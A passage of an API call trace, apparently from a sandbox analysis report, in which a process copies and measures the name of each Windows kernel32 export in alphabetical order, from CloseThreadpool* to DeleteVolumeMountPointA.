(lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0158.203] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0158.203] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0158.203] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0158.203] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0158.203] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0158.203] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0158.203] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0158.203] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0158.204] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0158.204] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0158.204] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0158.204] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0158.204] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0158.204] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0158.204] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0158.204] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0158.204] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0158.204] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0158.204] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0158.204] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0158.204] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0158.204] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0158.204] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0158.204] lstrlenA (lpString="COPYCONTEXT") returned 11 [0158.204] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0158.205] lstrlenA (lpString="COPYFILEA") returned 9 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0158.205] lstrlenA (lpString="COPYFILEEXA") returned 11 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0158.205] lstrlenA (lpString="COPYFILEEXW") returned 11 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0158.205] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0158.205] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0158.205] lstrlenA (lpString="COPYFILEW") returned 9 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0158.205] lstrlenA (lpString="COPYLZFILE") returned 10 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0158.205] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0158.205] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0158.205] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0158.205] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0158.205] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0158.205] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0158.205] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0158.205] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0158.206] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0158.206] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0158.206] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0158.206] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0158.206] lstrlenA (lpString="CREATEEVENTA") returned 12 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0158.206] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0158.206] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0158.206] lstrlenA (lpString="CREATEEVENTW") returned 12 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0158.206] lstrlenA (lpString="CREATEFIBER") returned 11 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0158.206] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0158.206] lstrlenA (lpString="CREATEFILEA") returned 11 [0158.206] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0158.206] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0158.207] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0158.207] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0158.207] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0158.207] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0158.207] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0158.207] lstrlenA (lpString="CREATEFILEW") returned 11 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0158.207] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0158.207] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0158.207] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0158.207] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0158.207] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0158.207] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0158.207] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0158.207] lstrlenA (lpString="CREATEJOBSET") returned 12 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0158.207] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0158.207] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0158.207] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0158.208] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0158.208] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0158.208] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0158.208] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0158.208] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0158.208] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0158.208] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0158.208] lstrlenA (lpString="CREATEPIPE") returned 10 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0158.208] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0158.208] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0158.208] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.208] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0158.208] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0158.208] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0158.208] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0158.208] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0158.208] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0158.209] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0158.209] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0158.209] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0158.209] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0158.209] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0158.209] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0158.209] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0158.209] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0158.209] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0158.209] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0158.209] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0158.209] lstrlenA (lpString="CREATETHREAD") returned 12 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0158.209] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0158.209] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0158.209] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0158.209] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0158.209] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0158.209] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0158.210] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0158.210] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0158.210] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0158.210] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0158.210] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0158.210] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0158.210] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0158.210] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0158.210] lstrlenA (lpString="CTRLROUTINE") returned 11 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0158.210] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0158.210] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0158.210] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0158.210] lstrlenA (lpString="DEBUGBREAK") returned 10 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0158.210] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0158.210] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0158.210] lstrlenA (lpString="DECODEPOINTER") returned 13 [0158.210] lstrcpyA (in: lpString1=0x239efd4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0158.211] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0158.211] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0158.211] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0158.211] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0158.211] lstrlenA (lpString="DELETEATOM") returned 10 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0158.211] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0158.211] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0158.211] lstrlenA (lpString="DELETEFIBER") returned 11 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0158.211] lstrlenA (lpString="DELETEFILEA") returned 11 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0158.211] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0158.211] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0158.211] lstrlenA (lpString="DELETEFILEW") returned 11 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0158.211] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0158.211] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0158.211] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0158.211] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0158.212] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteVolumeMountPointA" | out: 